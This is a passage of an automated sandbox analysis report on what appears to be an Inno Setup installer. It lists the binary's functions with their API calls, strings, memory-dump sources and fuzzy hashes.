Opcode ID: 7c80af42b102e27edf5db655613db814b4685419315c422c8b7ce9c7c8cae370
Instruction ID: b767a2b0357b006b48fec58faac565969e4e2695d2e87526588baf6f991b03ff
Opcode Fuzzy Hash: 7c80af42b102e27edf5db655613db814b4685419315c422c8b7ce9c7c8cae370
Instruction Fuzzy Hash: 99518371B44615EEEB10EAE6A842B7F7BACDB09304F9404BBB501F7282D5789904867D

Function 00450334 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 45
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00480FD9), ref: 00450347
LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480FD9), ref: 0045035F
GetProcAddress.KERNEL32(6FF10000,RmStartSession), ref: 0045037D
GetProcAddress.KERNEL32(6FF10000,RmRegisterResources), ref: 00450392
GetProcAddress.KERNEL32(6FF10000,RmGetList), ref: 004503A7
GetProcAddress.KERNEL32(6FF10000,RmShutdown), ref: 004503BC
GetProcAddress.KERNEL32(6FF10000,RmRestart), ref: 004503D1
GetProcAddress.KERNEL32(6FF10000,RmEndSession), ref: 004503E6

Strings

RmEndSession, xrefs: 004503DB
RmShutdown, xrefs: 004503B1
RmRestart, xrefs: 004503C6
RmGetList, xrefs: 0045039C
Rstrtmgr.dll, xrefs: 0045035A
RmStartSession, xrefs: 00450372
RmRegisterResources, xrefs: 00450387

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoadVersion
String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
API String ID: 1968650500-3419246398
Opcode ID: ba4799ed598e863f1006e140a948279c49c85d1dce31870895334632bea49e72
Instruction ID: 01977ea06872d8050a8028e1fd06f6bfd4923f5c9242ba3c4897223f9bd4e12c
Opcode Fuzzy Hash: ba4799ed598e863f1006e140a948279c49c85d1dce31870895334632bea49e72
Instruction Fuzzy Hash: 2711C9B4550200DBD710FB79ADC5A2A32E4E765717F58163BB940AB1A3C67C4848CF2C

Function 00423C1C Relevance: 21.4, APIs: 14, Instructions: 395
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6031c6058a4147557a324cf51ffefd4fe9d2f91239d218d1be50ed81b108de41
Instruction ID: e16ee7298f114c8dbeebd16f5ebee6ca6ec91daf226906b03d032974817fe50e
Opcode Fuzzy Hash: 6031c6058a4147557a324cf51ffefd4fe9d2f91239d218d1be50ed81b108de41
Instruction Fuzzy Hash: 87E1A130700224DFD704EF59E989A6EB7F5EB94304F9480A6E545AB352C73CEE91DB08

Function 0046744C Relevance: 13.9, APIs: 4, Strings: 3, Instructions: 1656windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00495FA4: GetWindowRect.USER32(00000000), ref: 00495FBA

LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 0046781B

Part of subcall function 0041D6C0: GetObjectA.GDI32(?,00000018,00467835), ref: 0041D6EB

Part of subcall function 00467228: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 004672CB
Part of subcall function 00467228: ExtractIconA.SHELL32(00400000,00000000,?), ref: 004672F1
Part of subcall function 00467228: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 00467348

Part of subcall function 00466BE8: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,004678D0,00000000,00000000,00000000,0000000C,00000000), ref: 00466C00

Part of subcall function 00496228: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00496232

Part of subcall function 0042ED48: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDB8
Part of subcall function 0042ED48: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDD5

Part of subcall function 00495EF4: GetDC.USER32(00000000), ref: 00495F16
Part of subcall function 00495EF4: SelectObject.GDI32(?,00000000), ref: 00495F3C
Part of subcall function 00495EF4: ReleaseDC.USER32(00000000,?), ref: 00495F8D

Part of subcall function 00496218: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00496222

GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0213F370,021410D0,?,?,02141100,?,?,02141150,?), ref: 004684BF
AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 004684D0
AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 004684E8

Strings

, xrefs: 004678DD
(Default), xrefs: 00468AD1
STOPIMAGE, xrefs: 00467810

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Menu$AppendExtractIconObject$AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadProcRectReleaseSelectSystemUserWindow
String ID: $(Default)$STOPIMAGE
API String ID: 616467991-770201673
Opcode ID: 87bcb674c8b66ef52b6acd084ab0e16fc1d5b69bf8698de0b4974f4e12f6faa5
Instruction ID: 31ed69900cd485df966db968cea1a759f135fc149481760ad81ee09e41d161c5
Opcode Fuzzy Hash: 87bcb674c8b66ef52b6acd084ab0e16fc1d5b69bf8698de0b4974f4e12f6faa5
Instruction Fuzzy Hash: 5BF2C5786005209FCB00EB69D4D9F9973F1BF49304F1542BAE5049B36ADB78EC46CB9A

Function 004753C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,0047552E,?,?,0049D1E0,00000000), ref: 0047541D
FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,0047552E,?,?,0049D1E0,00000000), ref: 004754FA
FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,0047552E,?,?,0049D1E0,00000000), ref: 00475508

Strings

unins, xrefs: 00475470
unins???.*, xrefs: 00475407

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID: unins$unins???.*
API String ID: 3541575487-1009660736
Opcode ID: 006caa83065a4b314e272e4727ac650bfdae0cbda1ab0d326659006c62220b60
Instruction ID: 94c2e66123b914be41fb9230d3e0bd96c7eed6bd52dd6cc9b7e2a75fa87f4789
Opcode Fuzzy Hash: 006caa83065a4b314e272e4727ac650bfdae0cbda1ab0d326659006c62220b60
Instruction Fuzzy Hash: 7D315370600558ABDB10EB69CD41BDEB7B9EF44304F5480B6A40CAB3A6DB78DF819B58

Function 00452AD4 Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,00452B37,?,?,-00000001,00000000), ref: 00452B11
GetLastError.KERNEL32(00000000,?,00000000,00452B37,?,?,-00000001,00000000), ref: 00452B19

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorFileFindFirstLast
String ID:
API String ID: 873889042-0
Opcode ID: f2dc6f419a982de125fb7f286a4efffe8647e33f6b471eccd8a31571119839a2
Instruction ID: 47a0ca8b87b913a19c884f83f9383acd825b8acbe58efe6d1ea2a1073528362f
Opcode Fuzzy Hash: f2dc6f419a982de125fb7f286a4efffe8647e33f6b471eccd8a31571119839a2
Instruction Fuzzy Hash: 69F04931A00604AB8B10DF6A9D4189EF7ACEB4632171042BBFC14E3292DAB85E048558

Function 0046E1E4 Relevance: 3.0, APIs: 2, Instructions: 28comCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(000003B0,0046E27A), ref: 0046E1EE
CoCreateInstance.OLE32(0049AB98,00000000,00000001,0049ABA8,?,000003B0,0046E27A), ref: 0046E20A

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateInstanceVersion
String ID:
API String ID: 1462612201-0
Opcode ID: a4af8d076fcecf17adfdc3d0480ff287c2d0b6366a88815b83ba2acce94f7983
Instruction ID: 2583b72e9ff3fb42948badd432de3b99868d7e942e7e47a623e6463d1fe0ae05
Opcode Fuzzy Hash: a4af8d076fcecf17adfdc3d0480ff287c2d0b6366a88815b83ba2acce94f7983
Instruction Fuzzy Hash: 58F0E5346412009EFB10E77AEC46B4A37CAAB21319F5004BBF144A7292E2ACE495870F

Function 00408578 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049C4C0,00000001,?,00408643,?,00000000,00408722), ref: 00408596

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: eb14f04c5e02207c2fd5126442fac2e3d3ce4c3ff781734da4d02da34a9f601e
Instruction ID: 7c1c2e54cb9be6942265fc2fe4f8d610b96419e03c3bde54798e363261146e82
Opcode Fuzzy Hash: eb14f04c5e02207c2fd5126442fac2e3d3ce4c3ff781734da4d02da34a9f601e
Instruction Fuzzy Hash: D1E09271700614A6D311A95A9C86AEAB35C9B68314F00427FB944E73C6EDB89E4046E9

Function 00423B94 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424161,?,00000000,0042416C), ref: 00423BBE

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 1e03a0b95ee3ac50814388fded2f2c100431d5d137ce34ba8ee35217fcdc3973
Instruction ID: 626c949ff67c0b5daba62b8ffba664747ea83a29b03f4787c3cb7294a8149fcf
Opcode Fuzzy Hash: 1e03a0b95ee3ac50814388fded2f2c100431d5d137ce34ba8ee35217fcdc3973
Instruction Fuzzy Hash: 9CF0B379205608AF8B40DF99C588D4ABBE8AB4C260B058295B988CB321C234EE808F94

Function 00455644 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?), ref: 0045565A

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: b729cb2c5e6aed0314aaf1ae3f51ea3427620088d531228546b40ff94aa38a59
Instruction ID: 1d2ebe8de6f6cfe3948c3fff4a7e090af1b7aca458264ab6234f43f9cc1e19d2
Opcode Fuzzy Hash: b729cb2c5e6aed0314aaf1ae3f51ea3427620088d531228546b40ff94aa38a59
Instruction Fuzzy Hash: 94D0C2B130460063D700AA689C926AA368C8B84345F00483E3CC9DA2D3EABDDA48169A

Function 0042F594 Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F5B0

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 0f3603468c344ce3f2e9376b2c090f409274960c84c57a5106e539cc1743996a
Instruction ID: 438f9cd868ded5fa8976115e55c89a445960fd054612ac8023f685210e8cb482
Opcode Fuzzy Hash: 0f3603468c344ce3f2e9376b2c090f409274960c84c57a5106e539cc1743996a
Instruction Fuzzy Hash: 52D09E7221010DBB9B00DE99D840D6B33AD9B88754B908925F545C7346D634ED619BB5

Function 0046F250 Relevance: 72.2, APIs: 1, Strings: 40, Instructions: 500
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0046F03C: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,JfG,?,0049D1E0,?,0046F353,?,00000000,0046F8EE,?,_is1), ref: 0046F05F

Part of subcall function 0046F0AC: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F72A,?,?,00000000,0046F8EE,?,_is1,?), ref: 0046F0BF

RegCloseKey.ADVAPI32(?,0046F8F5,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F940,?,?,0049D1E0,00000000), ref: 0046F8E8

Strings

DisplayVersion, xrefs: 0046F5FC
Readme, xrefs: 0046F6AA
InstallLocation, xrefs: 0046F396
HelpTelephone, xrefs: 0046F653
DisplayIcon, xrefs: 0046F56B
" /SILENT, xrefs: 0046F5D2
Inno Setup: Setup Version, xrefs: 0046F341
DisplayName, xrefs: 0046F54E
Comments, xrefs: 0046F6E4
EstimatedSize, xrefs: 0046F865
MinorVersion, xrefs: 0046F789
HelpLink, xrefs: 0046F670
Inno Setup: User Info: Name, xrefs: 0046F49E
ModifyPath, xrefs: 0046F704
Inno Setup: Deselected Tasks, xrefs: 0046F486
NoModify, xrefs: 0046F718
Inno Setup: Language, xrefs: 0046F4EF
Inno Setup: Setup Type, xrefs: 0046F401
Inno Setup: User Info: Serial, xrefs: 0046F4C8
5.5.6 (a), xrefs: 0046F346
Inno Setup: User, xrefs: 0046F3E2
Inno Setup: User Info: Organization, xrefs: 0046F4B3
InstallDate, xrefs: 0046F74B
MajorVersion, xrefs: 0046F777
UninstallString, xrefs: 0046F5A5
_is1, xrefs: 0046F2AC
Inno Setup: Deselected Components, xrefs: 0046F43F
NoRepair, xrefs: 0046F72C
Inno Setup: Icon Group, xrefs: 0046F3A5
Inno Setup: App Path, xrefs: 0046F376
Inno Setup: No Icons, xrefs: 0046F3C3
URLInfoAbout, xrefs: 0046F636
URLUpdateInfo, xrefs: 0046F68D
QuietUninstallString, xrefs: 0046F5DF
Software\Microsoft\Windows\CurrentVersion\Uninstall\, xrefs: 0046F2A6
Contact, xrefs: 0046F6C7
RegisterPreviousData, xrefs: 0046F89E
Inno Setup: Selected Components, xrefs: 0046F420
Inno Setup: Selected Tasks, xrefs: 0046F467
Publisher, xrefs: 0046F619

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Value$Close
String ID: " /SILENT$5.5.6 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
API String ID: 3391052094-4001681900
Opcode ID: a16e9e7cc9b65a2e75ab3d1661429793c0d5d2348bba62312aff7163a21646dc
Instruction ID: 2d81112130bbfcb2548f8b376684fbb7cc3ec4c1e14eddd466eba1ede3ae6ff4
Opcode Fuzzy Hash: a16e9e7cc9b65a2e75ab3d1661429793c0d5d2348bba62312aff7163a21646dc
Instruction Fuzzy Hash: DD126735A001089BCB14EF55F881ADE73F5EB48304F60817BE854AB396EB78BD49CB59

Function 00492DEC Relevance: 56.4, APIs: 16, Strings: 16, Instructions: 431
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,00000000,004932E1,?,?,?,?,00000000,00000000,00000000), ref: 00492E2C
FindWindowA.USER32(00000000,00000000), ref: 00492E5D

Strings

POSTMESSAGE, xrefs: 00492F07
SENDBROADCASTMESSAGE, xrefs: 00492FF9
OEMTOCHARBUFF, xrefs: 0049323F
SENDBROADCASTNOTIFYMESSAGE, xrefs: 0049309B
FINDWINDOWBYWINDOWNAME, xrefs: 00492E75
CREATEMUTEX, xrefs: 0049320D
CALLDLLPROC, xrefs: 00493151
SENDNOTIFYMESSAGE, xrefs: 00492F63
POSTBROADCASTMESSAGE, xrefs: 00493047
SLEEP, xrefs: 00492E16
SENDMESSAGE, xrefs: 00492EB1
CHARTOOEMBUFF, xrefs: 00493282
FREEDLL, xrefs: 004931D8
FINDWINDOWBYCLASSNAME, xrefs: 00492E39
REGISTERWINDOWMESSAGE, xrefs: 00492FBF
LOADDLL, xrefs: 004930EF

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FindSleepWindow
String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
API String ID: 3078808852-3310373309
Opcode ID: 8cf265b3f066c72d7016e9308515d3dcb7ecb2149754d0420987ba3a70bb973f
Instruction ID: 0de698378398c76d082fe6c781760205a02602346193583708d777b6c814c377
Opcode Fuzzy Hash: 8cf265b3f066c72d7016e9308515d3dcb7ecb2149754d0420987ba3a70bb973f
Instruction Fuzzy Hash: C9C18360B0821067DB14BF7E8C4261E5A999F99B05710CD7FB446EB38BCE3DDE0A425D

Function 00483F60 Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 68
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483F71
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483F7E
GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483F8C
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483F94
GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483FA0
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483FC1
GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483FD4
GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483FDA
GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483FF1

Strings

IsWow64Process, xrefs: 00483F8E
kernel32.dll, xrefs: 00483F6C
GetNativeSystemInfo, xrefs: 00483F78
advapi32.dll, xrefs: 00483FCF
GetSystemWow64DirectoryA, xrefs: 00483FBB
RegDeleteKeyExA, xrefs: 00483FCA

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
API String ID: 2230631259-2623177817
Opcode ID: 2201496c5c445ff8090de454bf6ebb37dd8ee277a0fffd9fa5a8cd1afd0d38d8
Instruction ID: debdefcd9c900846d3217bdd74a69f8d0e186994afde8710a0eb2db1caaea97a
Opcode Fuzzy Hash: 2201496c5c445ff8090de454bf6ebb37dd8ee277a0fffd9fa5a8cd1afd0d38d8
Instruction Fuzzy Hash: 9E11E95180C74391D62177784C0676F2A988B92B59F080C377F80692C3DEBCC989A3AF

Function 00468E4C Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 155
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004840C7,?,00000001,?,?,004840C7,?,00000001,00000000), ref: 0042DE48

RegCloseKey.ADVAPI32(?,00469066,?,?,00000001,00000000,00000000,00469081,?,00000000,00000000,?), ref: 0046904F

Strings

Inno Setup: Selected Components, xrefs: 00468F6E
Inno Setup: Selected Tasks, xrefs: 00468FBB
%s\%s_is1, xrefs: 00468EC9
Inno Setup: User Info: Serial, xrefs: 00469031
Inno Setup: User Info: Name, xrefs: 0046900B
Inno Setup: Setup Type, xrefs: 00468F5E
Inno Setup: App Path, xrefs: 00468F0E
Inno Setup: Icon Group, xrefs: 00468F2A
Inno Setup: Deselected Components, xrefs: 00468F90
Inno Setup: User Info: Organization, xrefs: 0046901E
Inno Setup: No Icons, xrefs: 00468F37
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468EAB
Inno Setup: Deselected Tasks, xrefs: 00468FDD

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseOpen
